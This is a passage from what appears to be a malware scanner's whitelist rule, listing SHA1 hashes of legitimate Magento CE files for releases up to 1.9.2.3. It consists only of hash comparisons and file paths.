app/code/core/Mage/Core/Model/Layout.php 203 | hash.sha1(0, filesize) == "428645582e2c32c01ce4fbed0efc865a86cc1ce1" or // app/code/core/Mage/Dataflow/Model/Profile.php 204 | hash.sha1(0, filesize) == "2ed7f109642dbfec32434d722caea3ba919b78b1" or // app/code/core/Mage/GoogleBase/Model/Service/Item.php 205 | hash.sha1(0, filesize) == "59eca17b433527c716e39a79c2a6624267039031" or // lib/Mage/Autoload/Simple.php 206 | hash.sha1(0, filesize) == "aac39b74fe44c73becdbc55e1e13a07834f446ae" or // lib/Varien/Pear.php 207 | hash.sha1(0, filesize) == "be6109e866f11177febd1a4adff8b8f15dcd7d4b" or // lib/Varien/Data/Form/Element/Editor.php 208 | hash.sha1(0, filesize) == "382fb51970f59f803508285ee8d2c4a2616ecc73" or // lib/Varien/Data/Form/Element/Multiline.php 209 | hash.sha1(0, filesize) == "9c0c57a9d2df145526cbde494e00f0798ec40379" or // lib/Varien/File/Uploader.php 210 | hash.sha1(0, filesize) == "da6dbd6d8183b366dbf5ec1b4da8a064375452e3" or // lib/Zend/Session.php 211 | hash.sha1(0, filesize) == "af5d43214068dd919d70a61b66fb4b1761957b24" or // lib/Zend/View/Helper/HeadScript.php 212 | hash.sha1(0, filesize) == "4d80fe8363e9d04cb962d50b3d0d88f039673a0d" or // lib/Zend/Validate/File/MimeType.php 213 | hash.sha1(0, filesize) == "11a78fc89381ba37849a82529b024c656d9025d4" or // lib/Zend/Locale/Format.php 214 | hash.sha1(0, filesize) == "7d086827328b7494bc490fb7206b3366d2c38e6f" or // lib/Zend/Locale/Data.php 215 | hash.sha1(0, filesize) == "63283e976d5fea1f63c18e8a6793b3a4ab9d71d4" or // lib/Zend/Soap/Client.php 216 | hash.sha1(0, filesize) == "1e9a01653ac90098c876b77e97e3670589ec3787" or // lib/Zend/Serializer/Adapter/PhpCode.php 217 | hash.sha1(0, filesize) == "d75195ee5082cf62a51e1055e421ee8d4a2143b8" or // lib/Zend/Amf/Server.php 218 | hash.sha1(0, filesize) == "078401aeda210badab9ef4fc083a1b75292b2207" or // lib/Zend/Session/Exception.php 219 | hash.sha1(0, filesize) == "29ab7310cee069c1f6d76b53ec66a9edbd723de9" or // lib/Zend/Date/DateObject.php 220 | hash.sha1(0, filesize) == "20bf0974e247e157a44f3582ec075ea0d151e446" or // lib/Zend/Ldap/Converter.php 221 | 222 | /* Magento CE 1.5.0.0 */ 223 | hash.sha1(0, filesize) == "ca04390be3a2fb9125cc190f85eb6dc1ec99166a" or // downloader/Maged/Connect.php 224 | hash.sha1(0, filesize) == "d8521a4b500badf5608b9eefb1e7d4923d5c099c" or // downloader/lib/Mage/Autoload/Simple.php 225 | hash.sha1(0, filesize) == "542d271f564aa019943e9b5c9e82ba752da3807b" or // app/code/community/Find/Feed/Model/Import.php 226 | hash.sha1(0, filesize) == "ec386833ed576acee6a0cffae893d727b4fe20f5" or // app/code/core/Mage/ImportExport/Model/Import/Adapter.php 227 | hash.sha1(0, filesize) == "fe81b3452d5224fa03d122348ebd25fd6cf2bfe2" or // app/code/core/Mage/ImportExport/Model/Export/Entity/Customer.php 228 | hash.sha1(0, filesize) == "7e847df572b49a30b533058488d47256243281c5" or // app/code/core/Mage/ImportExport/Model/Export/Entity/Product/Type/Abstract.php 229 | hash.sha1(0, filesize) == "b8ec0477409e6a3cf29ef2f5a51dd18457630fc5" or // app/code/core/Mage/XmlConnect/Block/Adminhtml/Mobile/Form/Element/Image.php 230 | hash.sha1(0, filesize) == "3e4338a076ef79058f5a069a7c07c8c14aae5655" or // app/code/core/Mage/Core/Model/Translate/Inline.php 231 | hash.sha1(0, filesize) == "4d4913c1f71c8b77ce1748fc1ed2f9c7af26f0e9" or // app/code/core/Mage/Catalog/Block/Product/View/Options/Type/Select.php 232 | hash.sha1(0, filesize) == "6409bc5c48b2676c7592c490363f8dbda40f8cb6" or // lib/Varien/Data/Form/Element/Image.php 233 | hash.sha1(0, filesize) == "8bb683957e1d561f60a0c311f532543b16d70946" or // lib/Varien/File/Uploader.php 234 | hash.sha1(0, filesize) == "87cf0da9bfefa24aa8984a902200cf3c073d57af" or // lib/Zend/View/Helper/HeadScript.php 235 | hash.sha1(0, filesize) == "3686394c1369d3c95d2d4eb6e55af54f2c217edb" or // lib/Zend/Validate/File/MimeType.php 236 | hash.sha1(0, filesize) == "51f42d5712d78d3949e625bdbb1164fa5df21f37" or // lib/Zend/Locale/Format.php 237 | hash.sha1(0, filesize) == "8fee7dddf97ee0020242555eb7b4a210ee0c5ddf" or // lib/Zend/Locale/Data.php 238 | hash.sha1(0, filesize) == "997e8decd0cd34c4a5740adb8a54ab1192227a72" or // lib/Zend/Soap/Client.php 239 | hash.sha1(0, filesize) == "72077639b329556270e1cb8f67607e3a12818ecc" or // lib/Zend/Form/Decorator/HtmlTag.php 240 | hash.sha1(0, filesize) == "168196bd79743a1726e6f9c51b8cded7f379071c" or // lib/Zend/Serializer/Adapter/PhpCode.php 241 | hash.sha1(0, filesize) == "de086d6b6b7bd97c8cc02a5e71711625b5aa21f4" or // lib/Zend/Amf/Server.php 242 | hash.sha1(0, filesize) == "1f44a0506e92fbc4b93f630f2d4e269144e34c98" or // lib/Zend/Date/DateObject.php 243 | 244 | /* Magento CE 1.5.0.1 */ 245 | 246 | /* Magento CE 1.5.1.0 */ 247 | hash.sha1(0, filesize) == "1c1573c2f8fb87dc6d7fa4a86f9bed3966ab1559" or // app/code/core/Mage/Dataflow/Model/Profile.php 248 | hash.sha1(0, filesize) == "e219e7d6a09ace697b471c1dff1e818a089e7bdb" or // lib/Varien/Data/Form/Element/Multiline.php 249 | hash.sha1(0, filesize) == "1348243a2ef778d294f135f1eabd9b447a68276a" or // lib/Varien/File/Uploader.php 250 | 251 | /* Magento CE 1.6.0.0 */ 252 | hash.sha1(0, filesize) == "7c7c0e823b7149758466ce1c46b31cc752098981" or // downloader/Maged/Connect.php 253 | hash.sha1(0, filesize) == "f5355295887c7c920faec7a6649a3b0e501ed562" or // downloader/lib/Mage/Autoload/Simple.php 254 | hash.sha1(0, filesize) == "0d90dfcdadc2385454d6989c89e5619284d06a22" or // app/code/community/Find/Feed/Model/Import.php 255 | hash.sha1(0, filesize) == "ff8e400bbceefa8fb6ffdd7b6ca7c19424c3724c" or // app/code/core/Mage/ImportExport/Model/Import/Uploader.php 256 | hash.sha1(0, filesize) == "0cc50b85016c0a281d463eaea15d9a60c8dde353" or // app/code/core/Mage/ImportExport/Model/Import/Adapter.php 257 | hash.sha1(0, filesize) == "c7b1ac6cb88d57a1ecc9f1228530422418092734" or // app/code/core/Mage/ImportExport/Model/Export/Entity/Customer.php 258 | hash.sha1(0, filesize) == "6f04c753855b120250fb93c3f18120439bac61a3" or // app/code/core/Mage/ImportExport/Model/Export/Entity/Product/Type/Abstract.php 259 | hash.sha1(0, filesize) == "3ec46431440bbdd6dc012ec88ba8b2abb254a07a" or // app/code/core/Mage/CatalogRule/sql/catalogrule_setup/mysql4-upgrade-0.7.1-0.7.2.php 260 | hash.sha1(0, filesize) == "08cd39581eebdce66eba747d99564f92aecd81bb" or // app/code/core/Mage/Core/Model/Translate.php 261 | hash.sha1(0, filesize) == "73d6f4ad968b6597969a846607c7fc4951da21f8" or // app/code/core/Mage/Core/Model/Layout.php 262 | hash.sha1(0, filesize) == "faf6a7d584a991040910bc3c1b75b1b953749dac" or // app/code/core/Mage/Core/Model/Translate/Inline.php 263 | hash.sha1(0, filesize) == "533d7cf5e90b1d7531d869a733c28a1d7b96c087" or // app/code/core/Mage/Sitemap/Model/Resource/Catalog/Category.php 264 | hash.sha1(0, filesize) == "8df77b8fb1861b3a7d56dea614e329072170c4d4" or // app/code/core/Mage/Sitemap/Model/Resource/Catalog/Product.php 265 | hash.sha1(0, filesize) == "c4fe77c103e8133560598cddd3f5b5d6d51000ef" or // app/code/core/Mage/Catalog/Block/Product/View/Options/Type/Select.php 266 | hash.sha1(0, filesize) == "e7d5e027d6d8d5aed1b7e6e2bb9c4823a244d81c" or // app/code/core/Mage/Dataflow/Model/Profile.php 267 | hash.sha1(0, filesize) == "13f835ff37292f0f9cc6cf291c2d2c0bf3c6584d" or // app/code/core/Mage/Adminhtml/Model/Url.php 268 | hash.sha1(0, filesize) == "910a7ffd9e47fa7323afb954504e7f665959d0dc" or // app/code/core/Mage/Adminhtml/Block/System/Config/Form/Fieldset.php 269 | hash.sha1(0, filesize) == "9eddbdda8933a43af895db0198b11212ec0f9ca9" or // app/code/core/Mage/Adminhtml/Block/System/Config/Form/Field.php 270 | hash.sha1(0, filesize) == "ead5c7a448033fdad1d4a6703d4ffc3a46bd3b08" or // app/code/core/Mage/Adminhtml/Block/Customer/Edit/Renderer/Region.php 271 | hash.sha1(0, filesize) == "35fca9cb6bce8e10563f014a74e6832055f374be" or // app/design/frontend/base/default/template/customer/widget/dob.phtml 272 | hash.sha1(0, filesize) == "1881995b15ffff36404400667af328064456caba" or // lib/Varien/Pear.php 273 | hash.sha1(0, filesize) == "a2c4546364372caac2b6565f6b74987df5e54e4e" or // lib/Varien/File/Uploader.php 274 | 275 | /* Magento CE 1.6.1.0 */ 276 | 277 | /* Magento CE 1.6.2.0 */ 278 | 279 | /* Magento CE 1.7.0.0 */ 280 | hash.sha1(0, filesize) == "e37b356ab26b4d7acd052139f0ed063a4e242065" or // downloader/lib/Mage/Autoload/Simple.php 281 | hash.sha1(0, filesize) == "a675fe32e519294e608a11e0e7ad26c6c0ee39e9" or // app/code/core/Mage/ImportExport/Model/Import/Uploader.php 282 | hash.sha1(0, filesize) == "21396b418469673c1092f0ab94633f188d7baf15" or // app/code/core/Mage/ImportExport/Model/Export/Entity/Customer.php 283 | hash.sha1(0, filesize) == "dde0fd41aff7a751e69528f12eecdcb79261239a" or // app/code/core/Mage/ImportExport/Model/Export/Entity/Product/Type/Abstract.php 284 | hash.sha1(0, filesize) == "948a6b886901cae250b4314f7ec1880b5bcd98ee" or // app/code/core/Mage/CatalogRule/sql/catalogrule_setup/mysql4-upgrade-0.7.1-0.7.2.php 285 | hash.sha1(0, filesize) == "80b6306a8752dde8cebe44334f1c30e60509cae4" or // app/code/core/Mage/Core/Model/Translate.php 286 | hash.sha1(0, filesize) == "64c3885b5a8fc86af29bd6f08976d2da87727ddc" or // app/code/core/Mage/Core/Model/Layout.php 287 | hash.sha1(0, filesize) == "20a1cd0eb6f110bb98f35f2499614cb442959462" or // app/code/core/Mage/Sitemap/Model/Resource/Catalog/Category.php 288 | hash.sha1(0, filesize) == "8b45c11270942e161b69e71e49e1595dc388ad8f" or // app/code/core/Mage/Sitemap/Model/Resource/Catalog/Product.php 289 | hash.sha1(0, filesize) == "2af8367688d9131c9fb5c6c749f92d46dd216d3e" or // app/code/core/Mage/Dataflow/Model/Profile.php 290 | hash.sha1(0, filesize) == "a81945dcfc4fcf2e464669f02fc03bc09b231420" or // app/code/core/Mage/Adminhtml/Block/System/Config/Form/Field.php 291 | hash.sha1(0, filesize) == "0b4971706ce32b91df9649f61c0dbe52fa3c025b" or // app/design/frontend/default/iphone/template/catalog/product/view/media.phtml 292 | hash.sha1(0, filesize) == "b665a86b2caabb9efcf1c2013268cae2ec52dae5" or // app/design/frontend/base/default/template/customer/widget/dob.phtml 293 | hash.sha1(0, filesize) == "9f7c657e9cb4caeeef7fbdf7658bcb93fb7f504e" or // app/design/adminhtml/default/default/template/notification/toolbar.phtml 294 | hash.sha1(0, filesize) == "9e002eb833e32a1d8bf0e05b8f817d8e3788e6d3" or // lib/Varien/Autoload.php 295 | hash.sha1(0, filesize) == "744c53013d70f0ef8d60a4e6ff532d50aba2c798" or // lib/Varien/File/Uploader.php 296 | hash.sha1(0, filesize) == "53ad2d03a76e1460b5c0ce75b1bcee79d5f96e5a" or // js/tiny_mce/tiny_mce_jquery_src.js 297 | hash.sha1(0, filesize) == "5d709e1db0c76651ff2e04084349b41ec8ac349e" or // js/tiny_mce/tiny_mce_prototype_src.js 298 | hash.sha1(0, filesize) == "26684d59fecefd29796e1ce35b9c8fde4001f80d" or // js/tiny_mce/tiny_mce_src.js 299 | 300 | /* Magento CE 1.7.0.1 */ 301 | hash.sha1(0, filesize) == "a5dce2ba92736f0d1e33769d697b1777ddbadd98" or // app/code/core/Mage/Adminhtml/Block/System/Config/Form/Field.php 302 | 303 | /* Magento CE 1.7.0.2 */ 304 | 305 | /* Magento CE 1.8.0.0 */ 306 | hash.sha1(0, filesize) == "f4bfc9f458bdadf338482afddaa80530b1eb668f" or // cron.php 307 | hash.sha1(0, filesize) == "78f63461659a1a430b9e95910e3ad40daee0d7c4" or // downloader/lib/Mage/Autoload/Simple.php 308 | hash.sha1(0, filesize) == "47bc9993a2ae847ee1baded420bc864a9e2add82" or // app/code/core/Mage/ImportExport/Model/Import/Uploader.php 309 | hash.sha1(0, filesize) == "2ea72c5b3160e44b1ab812e40a002fd3ffb47e01" or // app/code/core/Mage/ImportExport/Model/Export/Entity/Customer.php 310 | hash.sha1(0, filesize) == "6053ccb397bd3237772c950e0c926f852a3231ed" or // app/code/core/Mage/ImportExport/Model/Export/Entity/Product/Type/Abstract.php 311 | hash.sha1(0, filesize) == "c5359f0b869bfc7d07d669dea5996fecdfb01ad7" or // app/code/core/Mage/CatalogRule/sql/catalogrule_setup/mysql4-upgrade-0.7.1-0.7.2.php 312 | hash.sha1(0, filesize) == "444479b4ce40a0c8e592d68a87c971934008a245" or // app/code/core/Mage/Core/Model/Translate.php 313 | hash.sha1(0, filesize) == "90f041175c2cea0f0663afa30f588fe4dad5b123" or // app/code/core/Mage/Core/Model/Layout.php 314 | hash.sha1(0, filesize) == "87feb95a759d68eb37cbed972425276586ae02bf" or // app/code/core/Mage/Dataflow/Model/Profile.php 315 | hash.sha1(0, filesize) == "51b39b52f31bd6376a99979ad1235ad1f5e4cb94" or // app/code/core/Mage/Adminhtml/Model/Url.php 316 | hash.sha1(0, filesize) == "2e2be1472eafa5164fb0c5926942ca9bfe670d2f" or // app/design/frontend/default/iphone/template/catalog/product/view/media.phtml 317 | hash.sha1(0, filesize) == "f0cfbfa1652bc187ad818823d9021507aa483610" or // app/design/frontend/base/default/template/customer/widget/dob.phtml 318 | hash.sha1(0, filesize) == "44034f3de404aff9ca5b4bd177814ccf1a488a91" or // app/design/adminhtml/default/default/template/notification/toolbar.phtml 319 | hash.sha1(0, filesize) == "58fe31ecb9fed1ea5e1ec6e5b9cbd7339000be21" or // lib/Varien/File/Uploader.php 320 | 321 | /* Magento CE 1.8.1.0 */ 322 | hash.sha1(0, filesize) == "2a72c042ddf3151bc189a1a1abee570911e5b90f" or // cron.php 323 | 324 | /* Magento CE 1.9.0.0 */ 325 | hash.sha1(0, filesize) == "beb8fa0b00d09fe07c4250b57638207d2baf58a9" or // app/code/core/Mage/ImportExport/Model/Import/Uploader.php 326 | hash.sha1(0, filesize) == "e49b97bd3d87338e45952d3c14110f8c58ff2944" or // app/code/core/Mage/ImportExport/Model/Export/Entity/Customer.php 327 | hash.sha1(0, filesize) == "0845429e8d7ec4db23031fa8567712b620716ce3" or // app/code/core/Mage/ImportExport/Model/Export/Entity/Product/Type/Abstract.php 328 | hash.sha1(0, filesize) == "030222d390a79416396528a36d00bd8782f42b44" or // app/code/core/Mage/CatalogRule/sql/catalogrule_setup/mysql4-upgrade-0.7.1-0.7.2.php 329 | hash.sha1(0, filesize) == "c20d1956300ab8a7c7249327fad8460e26bfe5a4" or // app/code/core/Mage/Core/Model/Translate.php 330 | hash.sha1(0, filesize) == "57b95e9be59894c37bc07a8ef8ec90b9599c1b4b" or // app/code/core/Mage/Core/Model/Layout.php 331 | hash.sha1(0, filesize) == "882cf7e8f1edef0e29af45c97243918e41ac8ed8" or // app/code/core/Mage/Dataflow/Model/Profile.php 332 | hash.sha1(0, filesize) == "d8cda57af7063c1727837dd8da9db48a67258126" or // app/code/core/Mage/Adminhtml/Model/Url.php 333 | hash.sha1(0, filesize) == "1f80886d6860858d4b67d021c374a167a4452a9f" or // app/design/frontend/default/iphone/template/catalog/product/view/media.phtml 334 | hash.sha1(0, filesize) == "6e7249490d2717c9b8472fbd045c7603752bf09d" or // app/design/frontend/base/default/template/customer/widget/dob.phtml 335 | hash.sha1(0, filesize) == "3edb4a845c40b7bd58a3c420c643fd1848d29a4a" or // app/design/adminhtml/default/default/template/notification/toolbar.phtml 336 | hash.sha1(0, filesize) == "56a365dec8f4871ff38b8d157557cd44c99a0f58" or // lib/Magento/Autoload/Simple.php 337 | hash.sha1(0, filesize) == "257622b757cb7a54fd2ca5248e1a36ebcd804cc0" or // lib/Zend/Session.php 338 | hash.sha1(0, filesize) == "6b5a32540833318714c783e546219d1ec7ff1d4c" or // lib/Zend/Tool/Project/Provider/Test.php 339 | hash.sha1(0, filesize) == "0f4d1b153641f3e38355e7b6e77d2ef0795d502a" or // lib/Zend/Validate/File/MimeType.php 340 | hash.sha1(0, filesize) == "d22c5d0518d02777887e16d52b8505aaa7f4165d" or // lib/Zend/Locale/Format.php 341 | hash.sha1(0, filesize) == "474e85d94ee74b3837b48ab9b0dcec24eb834974" or // lib/Zend/Locale/Data.php 342 | hash.sha1(0, filesize) == "8fa67d2a0a56159c7c45031d11fab3f8050c526d" or // lib/Zend/Soap/Client.php 343 | hash.sha1(0, filesize) == "ca6aec4ee5075ab676dc0834beebb16671535650" or // lib/Zend/Service/WindowsAzure/CommandLine/Scaffolders/DefaultScaffolder.phar 344 | hash.sha1(0, filesize) == "834db01a738509c1e104f97d5cd900c7b10d7205" or // lib/Zend/Service/WindowsAzure/CommandLine/Scaffolders/DefaultScaffolder/resources/PhpOnAzure.Web/resources/WebPICmdLine/Microsoft.Web.PlatformInstaller.UI.dll 345 | hash.sha1(0, filesize) == "a635e99c23f43b460511a7017cbde6020bb100b9" or // lib/Zend/Serializer/Adapter/PhpCode.php 346 | hash.sha1(0, filesize) == "843ff3ac422f19112c787b2ef63ae4e3341b6d16" or // lib/Zend/Amf/Server.php 347 | hash.sha1(0, filesize) == "0c76cda5268b7c886f075491ab2e0857edf1f30c" or // lib/Zend/Date/DateObject.php 348 | hash.sha1(0, filesize) == "08da1d6d302bd33f27081c3198ceeb6d902dfd00" or // lib/Zend/Ldap/Converter.php 349 | 350 | /* Magento CE 1.9.0.1 */ 351 | 352 | /* Magento CE 1.9.1.0 */ 353 | hash.sha1(0, filesize) == "5cc804265e9d69991e22aa92c82663fd03b1e9b8" or // app/code/core/Mage/ImportExport/Model/Import/Uploader.php 354 | hash.sha1(0, filesize) == "4866408493f2f83827ef0fd1d7fce1802d219cf3" or // app/code/core/Mage/ImportExport/Model/Export/Entity/Customer.php 355 | hash.sha1(0, filesize) == "5b534fb113a2a6e555bcb09d80576c8d92cc45f0" or // app/code/core/Mage/ImportExport/Model/Export/Entity/Product/Type/Abstract.php 356 | hash.sha1(0, filesize) == "f3b3eceb9c06bc59f23387c462b7817480efe1af" or // app/code/core/Mage/CatalogRule/sql/catalogrule_setup/mysql4-upgrade-0.7.1-0.7.2.php 357 | hash.sha1(0, filesize) == "3d560f39b99e47b72ede84e7d6ac69e198c22098" or // app/code/core/Mage/Core/Model/Translate.php 358 | hash.sha1(0, filesize) == "e782aee39e228d0fbb0bb894b740961c156eef5a" or // app/code/core/Mage/Core/Model/Layout.php 359 | hash.sha1(0, filesize) == "0c882e8ac2d88a395fc14da2b1eab649bf1be462" or // app/code/core/Mage/Dataflow/Model/Profile.php 360 | hash.sha1(0, filesize) == "91135f179fdbee4ac3806abba6120db0b73e6dbc" or // app/code/core/Mage/Adminhtml/Model/Url.php 361 | hash.sha1(0, filesize) == "07c71d2a531adb843589c60f42f940c4f3fe7dbe" or // app/design/frontend/default/iphone/template/catalog/product/view/media.phtml 362 | hash.sha1(0, filesize) == "71b10a4a0cd8956f30e5ce13a91e6bbd74fa5421" or // app/design/frontend/base/default/template/customer/widget/dob.phtml 363 | hash.sha1(0, filesize) == "410f0ba42bc4ffa69cf140768352368a3d09f73a" or // app/design/adminhtml/default/default/template/notification/toolbar.phtml 364 | hash.sha1(0, filesize) == "6be0dccd49f9878749ef9a85963e7f8d75b4d40d" or // lib/Magento/Autoload/Simple.php 365 | hash.sha1(0, filesize) == "a36be33cb14a5803bf0f4a6e188f6a0b16077853" or // lib/Varien/Autoload.php 366 | hash.sha1(0, filesize) == "ad57a755258346b526d694d2bc515b4171d16ea7" or // lib/Zend/Session.php 367 | hash.sha1(0, filesize) == "9d370bde321e7d936025773e0b3a8f7f01882f67" or // lib/Zend/Tool/Project/Provider/Test.php 368 | hash.sha1(0, filesize) == "62f77a3c4e2ea1ce8d00fe62a8065c3c2a892118" or // lib/Zend/Validate/File/MimeType.php 369 | hash.sha1(0, filesize) == "b8b3dbb3fb548a70b7ffb249862cb20c2e8826eb" or // lib/Zend/Locale/Format.php 370 | hash.sha1(0, filesize) == "f2c2a12241d8d571acafeb4ddfb7920c4b41ce9b" or // lib/Zend/Locale/Data.php 371 | hash.sha1(0, filesize) == "761b8134d057822aebd9b25599759593a62b59a8" or // lib/Zend/Soap/Client.php 372 | hash.sha1(0, filesize) == "32a5acd82a2e9163ca05a125c359e7f751ae55f3" or // lib/Zend/Serializer/Adapter/PhpCode.php 373 | hash.sha1(0, filesize) == "5699310fb6d6e827050e152f99a085b88b05e488" or // lib/Zend/Amf/Server.php 374 | hash.sha1(0, filesize) == "8864eef8ceda89c902d033be651a9353e3cf5e73" or // lib/Zend/Date/DateObject.php 375 | hash.sha1(0, filesize) == "ebe09e979a43c009fbea2d65ce01ab7941cfa49a" or // js/tiny_mce/tiny_mce_jquery_src.js 376 | hash.sha1(0, filesize) == "f7ce9a2c3cddf03aa2069b3a4faaa4b4011a8571" or // js/tiny_mce/tiny_mce_prototype_src.js 377 | hash.sha1(0, filesize) == "77abde98292c0e2ea60c3cb796f4eda512eaa575" or // js/tiny_mce/tiny_mce_prototype.js 378 | hash.sha1(0, filesize) == "10de582f689b58d046d08da55fdfbf90c08524f5" or // js/tiny_mce/tiny_mce_jquery.js 379 | hash.sha1(0, filesize) == "e4473407525b5d622aaaa3f626946c6ef3ce3c1a" or // js/tiny_mce/tiny_mce.js 380 | hash.sha1(0, filesize) == "818d1825aef53ec014568c10181d75e88491f9d0" or // js/tiny_mce/tiny_mce_src.js 381 | hash.sha1(0, filesize) == "9539b243cb405912b865b0db36b312a9fe44d510" or // js/tiny_mce/plugins/paste/editor_plugin_src.js 382 | 383 | /* Magento CE 1.9.1.1 */ 384 | hash.sha1(0, filesize) == "1a5df06c6ba7b717825db8d55e2ad3db8c834637" or // cron.php 385 | hash.sha1(0, filesize) == "abbd120b50f030bdd61e2ac14511d549cfac72f9" or // app/code/core/Mage/ImportExport/Model/Import/Uploader.php 386 | hash.sha1(0, filesize) == "02bfd222251a3b35bff55c213a6e8126a2e60784" or // app/code/core/Mage/ImportExport/Model/Export/Entity/Customer.php 387 | hash.sha1(0, filesize) == "0c11c755b73650408655af02ea304786bbafbe9d" or // app/code/core/Mage/ImportExport/Model/Export/Entity/Product/Type/Abstract.php 388 | hash.sha1(0, filesize) == "f8fcce0810ed8610fdc3d3dfa164d95835f84d93" or // app/code/core/Mage/CatalogRule/sql/catalogrule_setup/mysql4-upgrade-0.7.1-0.7.2.php 389 | hash.sha1(0, filesize) == "3734e1824e4ad9f0516344427f4cc246ae00776a" or // app/code/core/Mage/Core/Model/Translate.php 390 | hash.sha1(0, filesize) == "5f65da3c0df60ac43befc42ea990639da9a89039" or // app/code/core/Mage/Core/Model/Layout.php 391 | hash.sha1(0, filesize) == "947e91de8554856c73ade2a1c9e6fecb725a26d3" or // app/code/core/Mage/Dataflow/Model/Profile.php 392 | hash.sha1(0, filesize) == "4079c07a1059350c4d1e5a0bd3ad955cc4d02738" or // app/design/frontend/default/iphone/template/catalog/product/view/media.phtml 393 | hash.sha1(0, filesize) == "2b2d9c9ebe2144fe52d0e0be0cca17ea1285dbe7" or // app/design/frontend/base/default/template/customer/widget/dob.phtml 394 | hash.sha1(0, filesize) == "45ea8b1dbffc1166987d889780fa9e990c02836f" or // app/design/adminhtml/default/default/template/notification/toolbar.phtml 395 | hash.sha1(0, filesize) == "3b404a87888f839158b19e748c71bad0b0908605" or // lib/Magento/Autoload/Simple.php 396 | hash.sha1(0, filesize) == "e810f8d584b0ad3e43d7ab15fda1c666a466df85" or // lib/Mage/Autoload/Simple.php 397 | hash.sha1(0, filesize) == "da92179998e43536f4439c3fdc0eb51cc4db96b7" or // lib/Varien/Pear.php 398 | hash.sha1(0, filesize) == "fb0b0bf5cef93f8c817dad5872ce245f3d96d32d" or // lib/Varien/Autoload.php 399 | hash.sha1(0, filesize) == "782c7d8f1a2b06e5da59d0862766c6ba2b25f28e" or // lib/Varien/Data/Form/Element/Gallery.php 400 | hash.sha1(0, filesize) == "d6fdfc01c4644292bd08f73f19f2dc539536de2c" or // lib/Varien/Data/Form/Element/Multiline.php 401 | hash.sha1(0, filesize) == "c7d2ea2c3bd0ba9854630e3e63a950765c14f1bf" or // lib/Varien/File/Uploader.php 402 | hash.sha1(0, filesize) == "24dc54b5710bc353e5b3f493af8d3f18e99a2c3a" or // lib/Varien/Db/Tree.php 403 | 404 | /* Magento CE 1.9.2.0 */ 405 | hash.sha1(0, filesize) == "f9cc4c1a62436372f245fdda6a0a37e7df4a9cdb" or // cron.php 406 | hash.sha1(0, filesize) == "dd414df47f283a6db73cef174ab8e526512b64b8" or // lib/Zend/Tool/Project/Provider/Test.php 407 | hash.sha1(0, filesize) == "b8519e3973a2a0504942f31f905f7a6e9c533f63" or // lib/Zend/Validate/File/MimeType.php 408 | hash.sha1(0, filesize) == "89765ac6cbadcd08f693cd9f7557e42d90380313" or // lib/Zend/Locale/Format.php 409 | hash.sha1(0, filesize) == "72517e19f04eda76e203868603b3b5132d4ef9d7" or // lib/Zend/Locale/Data.php 410 | hash.sha1(0, filesize) == "dbc4bbfaecf84eeb4bf5c99c3e359bbbf32803be" or // lib/Zend/Soap/Client.php 411 | hash.sha1(0, filesize) == "b3f0a13af9d17e7ced224584c6447505586fdd1a" or // lib/Zend/Serializer/Adapter/PhpCode.php 412 | hash.sha1(0, filesize) == "a391b6abaf40851177c2a634c894a44a0fdcbd2d" or // lib/Zend/Amf/Server.php 413 | hash.sha1(0, filesize) == "227da1e56588f1d2c02ab5dd81784f1d38a5be5d" or // lib/Zend/Date/DateObject.php 414 | 415 | /* Magento CE 1.9.2.1 */ 416 | 417 | /* Magento CE 1.9.2.2 */ 418 | hash.sha1(0, filesize) == "9283d2576949b018bcc38dd35c28e4bf2d609db1" or // cron.php 419 | hash.sha1(0, filesize) == "66503bf10b6b58265728cc6e9b6d564bf5149bf2" or // lib/Zend/Session.php 420 | hash.sha1(0, filesize) == "0bab49baadf98015bfea963e0d9ae5944bec1233" or // lib/Zend/Locale/Data.php 421 | hash.sha1(0, filesize) == "b58925a24d9201f4efbc0f59782b2b99367ec006" or // lib/Zend/Amf/Server.php 422 | hash.sha1(0, filesize) == "7c00d311a20e650dccf8dff9d2eb346077ff91eb" or // lib/Zend/Date/DateObject.php 423 | 424 | /* Magento CE 1.9.2.3 */ 425 | hash.sha1(0, filesize) == "19dbc4997004bb618bcc7b1e76b572424c7c93d1" or // cron.php 426 | hash.sha1(0, filesize) == "0989b6d28e5238a966d6333299750251f6621cf4" or // app/code/core/Mage/ImportExport/Model/Import/Uploader.php 427 | hash.sha1(0, filesize) == "3d8a99b05b05488ad1c89c249712dc1e45e9d1be" or // app/code/core/Mage/ImportExport/Model/Export/Entity/Customer.php 428 | hash.sha1(0, filesize) == "2510ea6f36a7824721ef930bd3b34cb19b5a623a" or // app/code/core/Mage/ImportExport/Model/Export/Entity/Product/Type/Abstract.php 429 | hash.sha1(0, filesize) == "61c48e91b39b227207d857276ad43208a517f31a" or // app/code/core/Mage/CatalogRule/sql/catalogrule_setup/mysql4-upgrade-0.7.1-0.7.2.php 430 | hash.sha1(0, filesize) == "e25d06c0cae8b8e5992b28014d7e1de33b97ab3b" or // app/code/core/Mage/Core/Model/Translate.php 431 | hash.sha1(0, filesize) == "531a0be26ca6b9444ab714983fe9727826f9a1bd" or // app/code/core/Mage/Core/Model/Layout.php 432 | hash.sha1(0, filesize) == "91a98939132e7b67dd9c5d9d1aa7278cc9356922" or // app/code/core/Mage/Dataflow/Model/Profile.php 433 | hash.sha1(0, filesize) == "3173f1e7f8889b01bccf4b64ea98e8e9ea212883" or // app/code/core/Mage/Adminhtml/Model/Url.php 434 | hash.sha1(0, filesize) == "7229c6ac1a40b4e97e1ff0274a85b33ae3a3ae56" or // app/design/frontend/default/iphone/template/catalog/product/view/media.phtml 435 | hash.sha1(0, filesize) == "6e6978736bd02faf3350f54fd0711abda85995af" or // app/design/frontend/base/default/template/customer/widget/dob.phtml 436 | hash.sha1(0, filesize) == "2ade0c0fe3ba96238bcc8d9e486316ebebbc543d" or // app/design/adminhtml/default/default/template/notification/toolbar.phtml 437 | hash.sha1(0, filesize) == "06412e5959c3d322cf0702cd2533d6e89cc64b1e" or // lib/Magento/Autoload/Simple.php 438 | hash.sha1(0, filesize) == "1c7302f33d227f8bbb8e7dba6f45cacfa353a1e0" or // lib/Mage/Autoload/Simple.php 439 | hash.sha1(0, filesize) == "f60b8ccc6af994fcb5390858d913c6894daf8d6a" or // lib/Varien/Pear.php 440 | hash.sha1(0, filesize) == "e67dbb73a945ced9ca3b139b4bb9634d49890494" or // lib/Varien/Autoload.php 441 | hash.sha1(0, filesize) == "a3b95117cb53b32f15933a323d0caecb28ba8f59" or // lib/Varien/Data/Form/Element/Gallery.php 442 | hash.sha1(0, filesize) == "eddcb2ed2b259b3bc0819316a3f82e8e765010e3" or // lib/Varien/Data/Form/Element/Multiline.php 443 | hash.sha1(0, filesize) == 